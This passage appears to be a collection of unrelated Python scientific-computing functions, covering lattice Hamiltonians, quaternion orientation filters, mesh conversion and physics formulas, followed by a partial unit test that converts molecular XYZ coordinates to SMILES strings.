-dAB/2. # on-site energy \n h[i, mlat+i] = J[0]\n h[i, i+1] = J[1]\n h[mlat+i, mlat+i+1] = J[3]\n #\n tau[mlat+i, i] = J[2]\n elif (i%2==1):\n h[i,i] = -dAB/2. # on-site energy\n h[mlat+i,mlat+i] = dAB/2. # on-site energy \n h[i, mlat+i] = J[2]\n h[i, i+1] = J[3]\n h[mlat+i, mlat+i+1] = J[1]\n #\n tau[mlat+i, i] = J[0]\n\n # End of loop over lattice sites\n\n # The upper edge site\n if (mlat-1 % 2==0):\n h[mlat-1, mlat-1] = dAB/2. # on-site energy\n h[NN-1,NN-1] = -dAB/2. # on-site energy \n h[mlat-1, NN-1] = J[0]\n #\n tau[NN-1, mlat-1] = J[2]\n elif (mlat-1 % 2==1):\n h[mlat-1, mlat-1] = -dAB/2. # on-site energy\n h[NN-1,NN-1] = dAB/2. 
# on-site energy \n h[mlat-1, NN-1] = J[2]\n #\n tau[NN-1, mlat-1] = J[0] \n \n h = h + h.conj().T # make it hermitian\n return h, tau", "def _motion_a(self, lb: np.ndarray, ub: np.ndarray) -> np.ndarray:\n\n r1 = r.generate_uniform_random_number()\n motion = self.gamma * r1 * (np.expand_dims(ub, -1) - np.expand_dims(lb, -1))\n\n return motion", "def hadamard_multiplication(M, Y):\n middle_index = int(M.shape[0] / 2)\n M_quarter = M[:middle_index, :middle_index]\n Y_top = Y[:middle_index]\n Y_bot = Y[middle_index:]\n\n A = M_quarter @ Y_top\n B = M_quarter @ Y_bot\n\n U = np.concatenate((A+B, A-B))\n\n return U", "def _mps_expectation(self, RL, RR, A, Ac):\n T1 = np.tensordot(RL, A, axes=(1, 0))\n T2 = np.tensordot(T1, RR, axes=(2, 0))\n return np.tensordot(T2, Ac, axes=((0, 1, 2), (0, 1, 2)))", "def gram_schmidt(basis):\n orthog = np.array([None for _ in basis])\n mu = np.array([[None for _ in basis] for _ in basis])\n \n orthog[0] = basis[0]\n\n for i in range(1, len(basis)):\n for j in range(i):\n mu[i][j] = np.dot(basis[i], orthog[j])/sq_norm(orthog[j])\n orthog[i] = basis[i]\n for j in range(i):\n orthog[i] = orthog[i] - mu[i][j] * orthog[j]\n return orthog", "def wigner_gaunt(l1, l2, m):\n pref = sqrt((2*l1 + 1)*(2*l2 + 1)/(4*pi))\n return np.array([pref*sqrt(2*lpp + 1)*float(wigner_3j(l1,l2,lpp,m,-m,0)*wigner_3j(l1,l2,lpp,0,0,0))\n for lpp in range(abs(l1-l2), l1+l2+1, 2)])", "def T(self) -> BaseMatrix:", "def T(self) -> BaseMatrix:", "def interpolator(mat, distance):\n\n# calculate the place of each meassurement relative to the whole yourney of the\n# ship\n gesdistance = np.zeros(len(distance)+1)\n gesdis = distance[0]\n for i in range(1, len(distance)+1):\n gesdistance[i] = gesdistance[i-1] + distance[i-1]\n if i < len(distance):\n gesdis = gesdis + distance[i]\n\n# calculates the minimum distance for number of points of the interpolation\n mini = distance[0]\n for i in range(len(distance)):\n if distance[i] < mini:\n mini = distance[i]\n\n# interpolates linear over every depth\n newmat = np.zeros((len(mat), int(gesdis/mini)))\n\n wth = 0\n for leng in range(len(newmat)):\n newveloc = interp1d(gesdistance, mat[leng, :], kind=\"linear\")\n for wth in range(int(gesdis/mini)):\n newmat[leng, wth] = newveloc(wth*mini)\n for wdth in range(int(gesdis/mini)):\n newvelocdepth = interp1d(np.append(np.arange(0, 458, 20), 458), np.append(newmat[::20, wdth], newmat[457, wdth]), kind=\"linear\")\n for le in range(len(newmat)):\n newmat[le, wdth] = newvelocdepth(le)\n\n return np.flip(newmat), gesdis", "def mixing_matrix_2nu(sth):\n cth = sqrt(1.0-sth*sth)\n\n U00 = cth\n U01 = sth\n U10 = -sth\n U11 = cth\n\n return [[U00,U01],[U10,U11]]", "def _lrt(tup):\n d = np.abs(2 * (tup[0].logLike - tup[1].logLike))\n return chi2.sf(d, np.abs(tup[0].coefs.shape[0] - tup[1].coefs.shape[0]))", "def stairs_4(taille):\n a = np.arange(taille)\n b = np.hstack((a, taille, np.flip(a)))\n return b + b.reshape(-1, 1) # ou b + b[:, np.newaxis]", "def get_tqu(self):\n lx, ly = self.get_lxly()\n tpi = 2. 
* np.arctan2(lx, -ly)\n\n tfac = np.sqrt((self.nx * self.ny) / (self.dx * self.dy))\n\n tmap = np.fft.irfft2(self.tfft) * tfac\n qmap = np.fft.irfft2(\n np.cos(tpi) * self.efft - np.sin(tpi) * self.bfft) * tfac\n umap = np.fft.irfft2(\n np.sin(tpi) * self.efft + np.cos(tpi) * self.bfft) * tfac\n\n return tqumap(\n self.nx, self.dx, [tmap, qmap, umap], ny=self.ny, dy=self.dy)", "def invgeochart(w):\n # u = torch.asin(w[...,2])\n u = torch.acos(w[...,2])\n # v = torch.acos(w[...,0]/torch.cos(u))\n v = torch.atan(w[...,1]/w[...,0])\n return torch.stack((u,v+np.pi))", "def J(t,y):\n return A", "def TEB2TQU(iS,jS,TEBmat):\n assert TEBmat.shape == (ellmat.rshape[0],ellmat.rshape[1],3,3)\n ret = np.zeros(ellmat.rshape)\n for iX in range(3):\n for jX in range(3):\n ret += apply_RSX(apply_RSX(TEBmat[:,:,iX,jX],iS,iX),jS,jX)\n return ret", "def get_arms(self) -> (list, ob.TurnstileAxis):\n directions = [(0, 1), (1, 0), (0, -1), (-1, 0),\n (1, 1), (-1, 1), (1, -1), (-1, -1)]\n for dire in directions:\n x_neighbour = self.target.x_obj + dire[0]\n y_neighbour = self.target.y_obj + dire[1]\n neighbour = self.grid.obj_list[x_neighbour, y_neighbour]\n if isinstance(neighbour, ob.TurnstileAxis):\n axis = neighbour\n arms = []\n for dire in directions[:4]:\n x_potential_arm = axis.x_obj + dire[0]\n y_potential_arm = axis.y_obj + dire[1]\n potential_arm = self.grid.obj_list[\n x_potential_arm, y_potential_arm]\n if isinstance(potential_arm, ob.TurnstileBloc):\n arms.append(potential_arm)\n return arms, axis", "def qrst_tm_ao(y):\n return (y - (-0.6685))/0.2228", "def T_L(Td, taue):\n return np.sqrt(np.pi)/2.0 * taue * np.exp(-(np.pi*taue/(4*Td))*(np.pi*taue/(4*Td)))", "def approx_matrix(matrix, diagonal, lambdaa):\n\n\tadj_matrix = tf.add(matrix, tf.scalar_mul(lambdaa, diagonal))\n\n\treturn adj_matrix, get_diagonal(adj_matrix)", "def adem_basis_elt_2_map(*, Sq_fn, basis_elt):\r\n return [Sq_fn(Sq) for Sq in basis_elt]", "def f(self,un,tn):\n return -self.a(tn)*un + self.b(tn)", "def ConvertTrisToQuads(self):\n\n self.__do_essential_memebers_exist__()\n if self.element_type == \"quad\":\n return\n assert self.element_type == \"tri\"\n if self.IsHighOrder:\n raise ValueError('High order triangular elements cannot be converted to low/high order quads')\n\n tconv = time()\n\n # SPLIT THE TRIANGLE INTO 3 QUADS BY CONNECTING THE\n # MEDIAN AND MIDPOINTS OF THE TRIANGLE\n\n # FIND MEDIAN OF TRIANGLES\n # median = self.Median()\n median = np.sum(self.points[self.elements,:],axis=1)/self.elements.shape[1]\n # FIND EDGE MIDPOINTS OF TRIANGLES\n mid0 = np.sum(self.points[self.elements[:,:2],:],axis=1)/2.\n mid1 = np.sum(self.points[self.elements[:,[1,2]],:],axis=1)/2.\n mid2 = np.sum(self.points[self.elements[:,[2,0]],:],axis=1)/2.\n\n # STABLE APPROACH\n # points = np.zeros((1,2))\n # for elem in range(self.nelem):\n # quad0 = np.concatenate((self.points[self.elements[elem,0],:][None,:],mid0[elem,:][None,:],\n # median[elem,:][None,:],mid2[elem,:][None,:]),axis=0)\n # quad1 = np.concatenate((self.points[self.elements[elem,1],:][None,:],mid1[elem,:][None,:],\n # median[elem,:][None,:],mid0[elem,:][None,:]),axis=0)\n # quad2 = np.concatenate((self.points[self.elements[elem,2],:][None,:],mid2[elem,:][None,:],\n # median[elem,:][None,:],mid1[elem,:][None,:]),axis=0)\n # points = np.concatenate((points,quad0,quad1,quad2))\n # points = points[1:,:]\n\n points = np.zeros((3*self.nelem*4,2))\n points[::3*4,:] = self.points[self.elements[:,0],:]\n points[1::3*4,:] = mid0\n points[2::3*4,:] = median\n points[3::3*4,:] = 
mid2\n\n points[4::3*4,:] = self.points[self.elements[:,1],:]\n points[5::3*4,:] = mid1\n points[6::3*4,:] = median\n points[7::3*4,:] = mid0\n\n points[8::3*4,:] = self.points[self.elements[:,2],:]\n points[9::3*4,:] = mid2\n points[10::3*4,:] = median\n points[11::3*4,:] = mid1\n\n\n # KEEP ZEROFY ON, OTHERWISE YOU GET STRANGE BEHVAIOUR\n Decimals = 10\n rounded_points = points.copy()\n makezero(rounded_points)\n rounded_repoints = np.round(rounded_points,decimals=Decimals)\n points, idx_points, inv_points = unique2d(rounded_points,order=False,\n consider_sort=False,return_index=True,return_inverse=True)\n\n elements = np.arange(points.shape[0])[inv_points].reshape(3*self.nelem,4)\n\n self.__reset__()\n\n self.element_type = \"quad\"\n self.elements = elements\n self.points = points\n self.nelem = self.elements.shape[0]\n self.nnode = self.points.shape[0]\n self.GetBoundaryEdgesQuad()\n\n print(\"Triangular to quadrilateral mesh conversion took\", time() - tconv, \"seconds\")", "def SqrtSwap():\n\n return Operator(np.array([[[[ 1.0, 0.0],\n [ 0.0, 0.5 * (1 + 1j)]],\n [[ 0.0, 0.0],\n [ 0.5 * (1 - 1j), 0.0]]],\n [[[ 0.0, 0.5 * (1 - 1j)],\n [ 0.0, 0.0]],\n [[ 0.5 * (1 + 1j), 0.0],\n [ 0.0, 1.0]]]]))", "def updateMARG(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray, dt: float = None) -> np.ndarray:\n _assert_numerical_iterable(q, 'Quaternion')\n _assert_numerical_iterable(gyr, 'Tri-axial gyroscope sample')\n _assert_numerical_iterable(acc, 'Tri-axial accelerometer sample')\n _assert_numerical_iterable(mag, 'Tri-axial magnetometer sample')\n dt = self.Dt if dt is None else dt\n if gyr is None or not np.linalg.norm(gyr) > 0:\n return q\n if mag is None or not np.linalg.norm(mag) > 0:\n return self.updateIMU(q, gyr, acc)\n qDot = 0.5 * q_prod(q, [0, *gyr]) # (eq. 12)\n a_norm = np.linalg.norm(acc)\n if a_norm > 0:\n a = acc/a_norm\n m = mag/np.linalg.norm(mag)\n # Rotate normalized magnetometer measurements\n h = q_prod(q, q_prod([0, *m], q_conj(q))) # (eq. 45)\n bx = np.linalg.norm([h[1], h[2]]) # (eq. 46)\n bz = h[3]\n qw, qx, qy, qz = q/np.linalg.norm(q)\n # Objective function (eq. 31)\n f = np.array([2.0*(qx*qz - qw*qy) - a[0],\n 2.0*(qw*qx + qy*qz) - a[1],\n 2.0*(0.5-qx**2-qy**2) - a[2],\n 2.0*bx*(0.5 - qy**2 - qz**2) + 2.0*bz*(qx*qz - qw*qy) - m[0],\n 2.0*bx*(qx*qy - qw*qz) + 2.0*bz*(qw*qx + qy*qz) - m[1],\n 2.0*bx*(qw*qy + qx*qz) + 2.0*bz*(0.5 - qx**2 - qy**2) - m[2]])\n # Jacobian (eq. 32)\n J = np.array([[-2.0*qy, 2.0*qz, -2.0*qw, 2.0*qx ],\n [ 2.0*qx, 2.0*qw, 2.0*qz, 2.0*qy ],\n [ 0.0, -4.0*qx, -4.0*qy, 0.0 ],\n [-2.0*bz*qy, 2.0*bz*qz, -4.0*bx*qy-2.0*bz*qw, -4.0*bx*qz+2.0*bz*qx],\n [-2.0*bx*qz+2.0*bz*qx, 2.0*bx*qy+2.0*bz*qw, 2.0*bx*qx+2.0*bz*qz, -2.0*bx*qw+2.0*bz*qy],\n [ 2.0*bx*qy, 2.0*bx*qz-4.0*bz*qx, 2.0*bx*qw-4.0*bz*qy, 2.0*bx*qx ]])\n gradient = J.T@f # (eq. 34)\n gradient /= np.linalg.norm(gradient)\n qDot -= self.gain*gradient # (eq. 33)\n q += qDot*dt # (eq. 
13)\n q /= np.linalg.norm(q)\n return q", "def project_tangent(w, q, basis):\n w = w - innerprod_q2(w, q) * q\n bo = gram_schmidt(basis)\n\n wproj = w - innerprod_q2(w, bo[0]) * bo[0] - innerprod_q2(w, bo[1]) * bo[1]\n\n return (wproj)", "def orient_2d(p,q,r):\n return (q[0]-p[0])*(r[1]-p[1]) - (r[0]-p[0])*(q[1]-p[1])", "def le(self, x, y):", "def mo_six_hump_camel_func(x, y):\n x1 = x\n x2 = y\n term1 = (4-2.1*x1**2+(x1**4)/3) * x1**2\n term2 = x1*x2\n term3 = (-4+4*x2**2) * x2**2\n # y0 = np.linalg.norm(xvals)\n\n return term1, term2, term3", "def bilorentzian(mu, wid, x, m = 0.5): \n lx = x.shape[0]\n ix = np.where(x == mu)[0][0]\n \n y = np.ones(lx)\n y[0:ix] = lorentzian( mu, wid * m, x[0:ix] )\n y[ix+1:lx] = lorentzian( mu, wid * (1 - m), x[ix+1:lx] ) \n \n return y", "def _stieltjes_analytical(dist, order, normed):\n dimensions = len(dist)\n mom_order = numpy.arange(order+1).repeat(dimensions)\n mom_order = mom_order.reshape(order+1, dimensions).T\n coeff1, coeff2 = dist.ttr(mom_order)\n coeff2[:, 0] = 1.\n\n poly = chaospy.poly.collection.core.variable(dimensions)\n if normed:\n orth = [\n poly**0*numpy.ones(dimensions),\n (poly-coeff1[:, 0])/numpy.sqrt(coeff2[:, 1]),\n ]\n for order_ in range(1, order):\n orth.append(\n (orth[-1]*(poly-coeff1[:, order_])\n -orth[-2]*numpy.sqrt(coeff2[:, order_]))\n /numpy.sqrt(coeff2[:, order_+1])\n )\n norms = numpy.ones(coeff2.shape)\n else:\n orth = [poly-poly, poly**0*numpy.ones(dimensions)]\n for order_ in range(order):\n orth.append(\n orth[-1]*(poly-coeff1[:, order_])\n - orth[-2]*coeff2[:, order_]\n )\n orth = orth[1:]\n norms = numpy.cumprod(coeff2, 1)\n\n return orth, norms, coeff1, coeff2", "def get_stain_matrix(I):", "def get_spin1_alms(map_r, map_trans):\n assert len(map_r) == len(map_trans[0]) == len(map_trans[1])\n alm_r = hp.map2alm(map_r)\n alm_pm = hp.map2alm_spin(map_trans, 1)\n # alm_v = -alm_pm[0]\n # alm_w = -1j*alm_pm[1]\n # return alm_r, alm_v, alm_w\n return alm_r, alm_pm[0], alm_pm[1]", "def quatTrans(q, vA, inv = False):\n #norm = np.sqrt(np.sum(np.asarray(q)**2))\n #if np.abs(1 - norm) < 1e-3:\n # norm = 1\n norm = 1\n q1 = q[0]/norm\n q2 = q[1]/norm\n q3 = q[2]/norm\n qr = q[3]/norm\n q = [q1,q2,q3,qr]\n if inv == True:\n q = [-q1,-q2,-q3,qr]\n else:\n q = [q1,q2,q3,qr]\n mat = Rq(q)\n vB = mat*np.asarray(vA).reshape([3,1])\n return vB", "def stacked_L(robot: RobotPlanar, q: list, q_goal: list):\n LL = []\n LLinv = []\n\n Ts_ee = robot.get_full_pose_fast_lambdify(list_to_variable_dict(q))\n Ts_goal = robot.get_full_pose_fast_lambdify(list_to_variable_dict(q_goal))\n\n for ee in robot.end_effectors:\n\n T_0_ee = SE2_to_SE3(Ts_ee[ee[0]])\n Re = T_0_ee[0:3, 0:3]\n T_0_goal = SE2_to_SE3(Ts_goal[ee[0]])\n Rd = T_0_goal[0:3, 0:3]\n ll, llinv = L(Rd, Re)\n LL.append(np.eye(3))\n LLinv.append(np.eye(3))\n\n LL.append(ll)\n LLinv.append(llinv)\n\n LL = block_diag(*LL)\n LLinv = block_diag(*LLinv)\n\n return LL, LLinv", "def origami_H2_1cyl(l1,l2,l3,h,t):\n l = l1 + l2 + l3\n z = (h-1)*l+1\n x = [None] + range(2,h*l+2)\n for i in xrange(0,h*l,l):\n x[i+l] = i+1\n\n y = [None] + range(l+1,l*h+1) + [None]*l\n for i in xrange(l3):\n y[z + (t+i)%l] = l1+l2+i+1\n for i in xrange(l2):\n y[z + (l3+t+i)%l] = l1+i+1\n for i in xrange(l1):\n y[z + (l3+l2+t+i)%l] = i+1\n\n return Origami(x[1:],y[1:])", "def updateMARG(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray) -> np.ndarray:\n if gyr is None or not np.linalg.norm(gyr)>0:\n return q\n qEst = 0.5 * q_prod(q, [0, *gyr]) # (eq. 
12)\n a_norm = np.linalg.norm(acc)\n if a_norm>0:\n a = acc/a_norm\n if mag is None or not np.linalg.norm(mag)>0:\n return self.updateIMU(q, gyr, acc)\n m = mag/np.linalg.norm(mag)\n h = q_prod(q, q_prod([0, *m], q_conj(q))) # (eq. 45)\n bx = np.linalg.norm([h[1], h[2]]) # (eq. 46)\n bz = h[3]\n qw, qx, qy, qz = q/np.linalg.norm(q)\n # Gradient objective function (eq. 31) and Jacobian (eq. 32)\n f = np.array([2.0*(qx*qz - qw*qy) - a[0],\n 2.0*(qw*qx + qy*qz) - a[1],\n 2.0*(0.5-qx**2-qy**2) - a[2],\n 2.0*bx*(0.5 - qy**2 - qz**2) + 2.0*bz*(qx*qz - qw*qy) - m[0],\n 2.0*bx*(qx*qy - qw*qz) + 2.0*bz*(qw*qx + qy*qz) - m[1],\n 2.0*bx*(qw*qy + qx*qz) + 2.0*bz*(0.5 - qx**2 - qy**2) - m[2]]) # (eq. 31)\n J = np.array([[-2.0*qy, 2.0*qz, -2.0*qw, 2.0*qx ],\n [ 2.0*qx, 2.0*qw, 2.0*qz, 2.0*qy ],\n [ 0.0, -4.0*qx, -4.0*qy, 0.0 ],\n [-2.0*bz*qy, 2.0*bz*qz, -4.0*bx*qy-2.0*bz*qw, -4.0*bx*qz+2.0*bz*qx],\n [-2.0*bx*qz+2.0*bz*qx, 2.0*bx*qy+2.0*bz*qw, 2.0*bx*qx+2.0*bz*qz, -2.0*bx*qw+2.0*bz*qy],\n [ 2.0*bx*qy, 2.0*bx*qz-4.0*bz*qx, 2.0*bx*qw-4.0*bz*qy, 2.0*bx*qx ]]) # (eq. 32)\n gradient = J.T@f # (eq. 34)\n gradient /= np.linalg.norm(gradient)\n qEst -= self.gain*gradient # (eq. 33)\n q += qEst*self.Dt # (eq. 13)\n q /= np.linalg.norm(q)\n return q", "def wt_time_Locs(wt, loc):\n return (wt * loc)", "def trapezoid_area(lower, leg , upper):\n area = (((upper+lower)/2)*leg)\n return area", "def get_y(EQ, M):\n return (EQ[1] * ((-1) * EQ[0] * M[0] + EQ[1] * M[1]) - EQ[0] * EQ[2]) / (EQ[1] ** 2 + EQ[0] ** 2)", "def spectral_laplace(x_values, dd_math_function, sigma, ua, ub):\n B = []\n for x in x_values:\n B += [-dd_math_function(x, sigma)]\n B[0] = ua\n B[len(x_values) - 1] = ub\n #B ferdig\n A=[]\n for i in range (len(x_values)):\n a = []\n for j in range (len(x_values)):\n if i == 0 or i == len(x_values) - 1:\n a.append(lagrange(x_values, j, x_values[i]))\n else:\n a.append(dd_lagrange(x_values, j, x_values[i]))\n A.append(a)\n #A ferdig\n return np.linalg.solve(A, B)", "def rayleigh(th,r,wl,a,n1,n2):\n c = np.cos(th)\n c2,s2 = c**2, np.sin(th)**2\n k = 2*np.pi/wl\n n_2 = n2**2/n1**2\n m = (k**4)*(a**6)*(abs(n_2-1)**2) / ((abs(n_2+2)**2) * 2 * (r**2))\n return m*np.array([[1+c2 , -s2 , 0 , 0],\n [-s2 , 1+c2 , 0 , 0],\n [0 , 0 , 2*c , 0],\n [0 , 0 , 0 , 2*c]])", "def _gu_bilinear(self, h, r):\n mu1h = torch.matmul(self.mu1.weight, h.T) # [k, b]\n mu2r = torch.matmul(self.mu2.weight, r.T) # [k, b]\n return (mu1h * mu2r + self.bu.weight).T # [b, k]", "def test_xyz_to_smiles(self):\n xyz1 = \"\"\"S -0.06618943 -0.12360663 -0.07631983\nO -0.79539707 0.86755487 1.02675668\nO -0.68919931 0.25421823 -1.34830853\nN 0.01546439 -1.54297548 0.44580391\nC 1.59721519 0.47861334 0.00711000\nH 1.94428095 0.40772394 1.03719428\nH 2.20318015 -0.14715186 -0.64755729\nH 1.59252246 1.51178950 -0.33908352\nH -0.87856890 -2.02453514 0.38494433\nH -1.34135876 1.49608206 0.53295071\"\"\"\n\n xyz2 = \"\"\"O 2.64631000 -0.59546000 0.29327900\nO 2.64275300 2.05718500 -0.72942300\nC 1.71639100 1.97990400 0.33793200\nC -3.48200000 1.50082200 0.03091100\nC -3.85550400 -1.05695100 -0.03598300\nC 3.23017500 -1.88003900 0.34527100\nC -2.91846400 0.11144600 0.02829400\nC 0.76935400 0.80820200 0.23396500\nC -1.51123800 -0.09830700 0.09199100\nC 1.28495500 -0.50051800 0.22531700\nC -0.59550400 0.98573400 0.16444900\nC -0.94480400 -1.39242500 0.08331900\nC 0.42608700 -1.59172200 0.14650400\nH 2.24536500 1.93452800 1.29979800\nH 1.14735500 2.91082400 0.31665700\nH -3.24115200 2.03800800 0.95768700\nH -3.08546100 2.10616100 -0.79369800\nH -4.56858900 
1.48636200 -0.06630800\nH -4.89652000 -0.73067200 -0.04282300\nH -3.69325500 -1.65970000 -0.93924100\nH -3.72742500 -1.73294900 0.81894100\nH 3.02442400 -2.44854700 -0.56812500\nH 4.30341500 -1.72127600 0.43646000\nH 2.87318600 -2.44236600 1.21464900\nH -0.97434200 2.00182800 0.16800300\nH -1.58581300 -2.26344700 0.02264400\nH 0.81122400 -2.60336100 0.13267800\nH 3.16280800 1.25020800 -0.70346900\"\"\"\n\n xyz3 = \"\"\"N 2.24690600 -0.00006500 0.11597700\nC -1.05654800 1.29155000 -0.02642500\nC -1.05661400 -1.29150400 -0.02650600\nC -0.30514100 0.00000200 0.00533200\nC 1.08358900 -0.00003400 0.06558000\nH -0.39168300 2.15448600 -0.00132500\nH -1.67242600 1.35091400 -0.93175000\nH -1.74185400 1.35367700 0.82742800\nH -0.39187100 -2.15447800 0.00045500\nH -1.74341400 -1.35278100 0.82619100\nH -1.67091600 -1.35164600 -0.93286400\"\"\"\n\n xyz4 = \"\"\"C -0.86594600 0.19886100 2.37159000\nC 0.48486900 -0.16232000 1.75422500\nC 1.58322700 0.83707500 2.14923200\nC 0.88213600 -1.51753600 2.17861400\nN 1.17852900 -2.57013900 2.53313600\nN 0.51051200 -0.21074800 0.26080100\nN -0.51042000 0.21074000 -0.26079600\nC -0.48479200 0.16232300 -1.75422300\nC 0.86590400 -0.19926100 -2.37161200\nC -1.58344900 -0.83674100 -2.14921800\nC -0.88166600 1.51765700 -2.17859800\nN -1.17777100 2.57034900 -2.53309500\nH -1.16019200 1.20098300 2.05838400\nH -1.64220300 -0.50052400 2.05954500\nH -0.78054100 0.17214100 3.45935000\nH 1.70120000 0.85267300 3.23368300\nH 2.53492600 0.56708700 1.69019900\nH 1.29214500 1.83331400 1.80886700\nH 1.15987300 -1.20145600 -2.05838100\nH 0.78046800 -0.17257000 -3.45937100\nH 1.64236100 0.49992400 -2.05962300\nH -2.53504500 -0.56650600 -1.69011500\nH -1.70149200 -0.85224500 -3.23366300\nH -1.29263300 -1.83308300 -1.80892900\"\"\"\n\n xyz5 = \"\"\"O 0.90973400 -0.03064000 -0.09605500\nO 0.31656600 -0.00477100 -1.21127600\nO 2.17315400 -0.03069900 -0.09349100\"\"\"\n\n xyz6 = \"\"\"S 0.38431300 0.05370100 0.00000000\nN -1.13260000 0.07859900 0.00000000\nH 0.85151800 -1.28998600 0.00000000\"\"\"\n\n xyz7 = \"\"\"N 0.00000000 0.00000000 0.44654700\nN 0.00000000 0.00000000 -0.77510900\nH 0.86709400 0.00000000 1.02859700\nH -0.86709400 0.00000000 1.02859700\"\"\"\n\n xyz8 = \"\"\"N 0.00000000 0.00000000 0.65631400\nC 0.00000000 0.00000000 -0.50136500\nH 0.00000000 0.00000000 -1.57173600\"\"\"\n\n# xyz9 = \"\"\"S -0.00866000 -0.60254900 0.00000000\n# N -0.96878800 0.63275900 0.00000000\n# N 1.01229100 0.58298500 0.00000000\"\"\"\n#\n# xyz10 = \"\"\"O -0.79494500 -0.93969200 0.00000000\n# O -0.32753500 1.24003800 0.00000000\n# O 1.28811400 -0.24729000 0.00000000\n# N 0.14143500 0.11571500 0.00000000\n# H -1.65602000 -0.48026800 0.00000000\"\"\"\n#\n# xyz11 = \"\"\"O 1.64973000 -0.57433600 0.02610800\n# O 0.49836300 1.28744800 -0.18806200\n# N -0.57621600 -0.65116600 0.24595200\n# N -1.78357200 -0.10211200 -0.14953800\n# N 0.61460400 0.08152700 -0.00952700\n# H -0.42001200 -1.61494900 -0.03311600\n# H -1.72480300 0.33507600 -1.06884500\n# H -2.07362100 0.59363400 0.53038600\"\"\"\n\n xyz12 = \"\"\"O 1.10621000 0.00000000 -0.13455300\nO -1.10621000 0.00000000 -0.13455300\nN 0.00000000 0.00000000 0.33490500\"\"\"\n\n# xyz13 = \"\"\"O -0.37723000 -1.27051900 0.00000000\n# N -0.12115000 -0.04252600 0.00000000\n# N -0.95339100 0.91468300 0.00000000\n# C 1.31648000 0.33217600 0.00000000\n# H 1.76422500 -0.11051900 -0.89038300\n# H 1.76422500 -0.11051900 0.89038300\n# H 1.40045900 1.41618100 0.00000000\n# H -1.88127600 0.47189500 0.00000000\"\"\"\n\n xyz14 = \"\"\"S -0.12942800 0.11104800 
0.22427200\nO 0.98591500 -1.00752300 -0.31179100\nO -1.43956200 -0.44459900 -0.15048900\nO 0.32982400 1.44755400 -0.21682700\nH 1.85512700 -0.56879900 -0.36563700\"\"\"\n\n xyz15 = \"\"\"N 1.11543700 0.11100500 0.00000000\nN -0.11982300 -0.03150800 0.00000000\nN -1.25716400 0.01530300 0.00000000\nH 1.57747800 -0.80026300 0.00000000\"\"\"\n\n xyz16 = \"\"\"O 1.21678000 -0.01490600 0.00000000\nN 0.04560300 0.35628400 0.00000000\nC -1.08941100 -0.23907800 0.00000000\nH -1.97763400 0.37807800 0.00000000\nH -1.14592100 -1.32640500 0.00000000\"\"\"\n\n xyz17 = \"\"\"S 0.00000000 0.00000000 0.18275300\nO -0.94981300 -0.83167500 -0.84628900\nO 0.94981300 0.83167500 -0.84628900\nO 0.80426500 -0.99804200 0.85548500\nO -0.80426500 0.99804200 0.85548500\nH -1.67833300 -0.25442300 -1.13658700\nH 1.67833300 0.25442300 -1.13658700\"\"\"\n\n xyz18 = \"\"\"S 0.00000000 0.00000000 0.12264300\nO 1.45413200 0.00000000 0.12264300\nO -0.72706600 1.25931500 0.12264300\nO -0.72706600 -1.25931500 0.12264300\"\"\"\n\n xyz19 = \"\"\"N 1.16672400 0.35870400 -0.00000400\nN -1.16670800 0.35879500 -0.00000400\nC -0.73775600 -0.89086600 -0.00000100\nC 0.73767000 -0.89093000 -0.00000100\nC 0.00005200 1.08477000 -0.00000500\nH -1.40657400 -1.74401100 0.00000000\nH 1.40645000 -1.74411900 0.00000000\nH 0.00009400 2.16788100 -0.00000700\"\"\"\n\n xyz20 = \"\"\"C 3.09980400 -0.16068000 0.00000600\nC 1.73521600 0.45534600 -0.00002200\nC 0.55924400 -0.24765400 -0.00000300\nC -0.73300200 0.32890400 -0.00001600\nC -1.93406200 -0.42115800 0.00001300\nC -3.19432700 0.11090700 0.00000900\nH 3.67991400 0.15199400 -0.87914100\nH 3.67984100 0.15191400 0.87923000\nH 3.04908000 -1.25419800 -0.00004300\nH 1.68713300 1.54476700 -0.00005100\nH -0.81003200 1.41627100 -0.00004600\nH -1.83479400 -1.50747300 0.00004100\nH 0.61489300 -1.33808300 0.00002500\nH -3.35410300 1.18597200 -0.00001700\nH -4.07566100 -0.52115800 0.00003300\"\"\"\n\n mol1 = converter.molecules_from_xyz(converter.str_to_xyz(xyz1))[1]\n mol2 = converter.molecules_from_xyz(converter.str_to_xyz(xyz2))[1]\n mol3 = converter.molecules_from_xyz(converter.str_to_xyz(xyz3))[1]\n mol4 = converter.molecules_from_xyz(converter.str_to_xyz(xyz4))[1]\n mol5 = converter.molecules_from_xyz(converter.str_to_xyz(xyz5))[1]\n mol6 = converter.molecules_from_xyz(converter.str_to_xyz(xyz6), multiplicity=1)[1]\n mol7 = converter.molecules_from_xyz(converter.str_to_xyz(xyz7), multiplicity=1)[1]\n mol8 = converter.molecules_from_xyz(converter.str_to_xyz(xyz8))[1]\n # mol9 = converter.molecules_from_xyz(converter.str_to_xyz(xyz9), multiplicity=1)[1]\n # mol10 = converter.molecules_from_xyz(converter.str_to_xyz(xyz10))[1]\n # mol11 = converter.molecules_from_xyz(converter.str_to_xyz(xyz11))[1]\n mol12 = converter.molecules_from_xyz(converter.str_to_xyz(xyz12))[1]\n # mol13 = converter.molecules_from_xyz(converter.str_to_xyz(xyz13))[1]\n mol14 = converter.molecules_from_xyz(converter.str_to_xyz(xyz14))[1]\n mol15 = converter.molecules_from_xyz(converter.str_to_xyz(xyz15))[1]\n mol16 = converter.molecules_from_xyz(converter.str_to_xyz(xyz16))[1]\n mol17 = converter.molecules_from_xyz(converter.str_to_xyz(xyz17))[1]\n mol18 = converter.molecules_from_xyz(converter.str_to_xyz(xyz18))[1]\n mol19 = converter.molecules_from_xyz(converter.str_to_xyz(xyz19))[1]\n mol20 = converter.molecules_from_xyz(converter.str_to_xyz(xyz20))[1]\n\n self.assertEqual(mol1.to_smiles(), '[NH-][S+](=O)(O)C')\n self.assertIn(mol2.to_smiles(), ['COC1=C(CO)C=C([C](C)C)C=C1', 'COC1C=CC(=CC=1CO)[C](C)C'])\n 
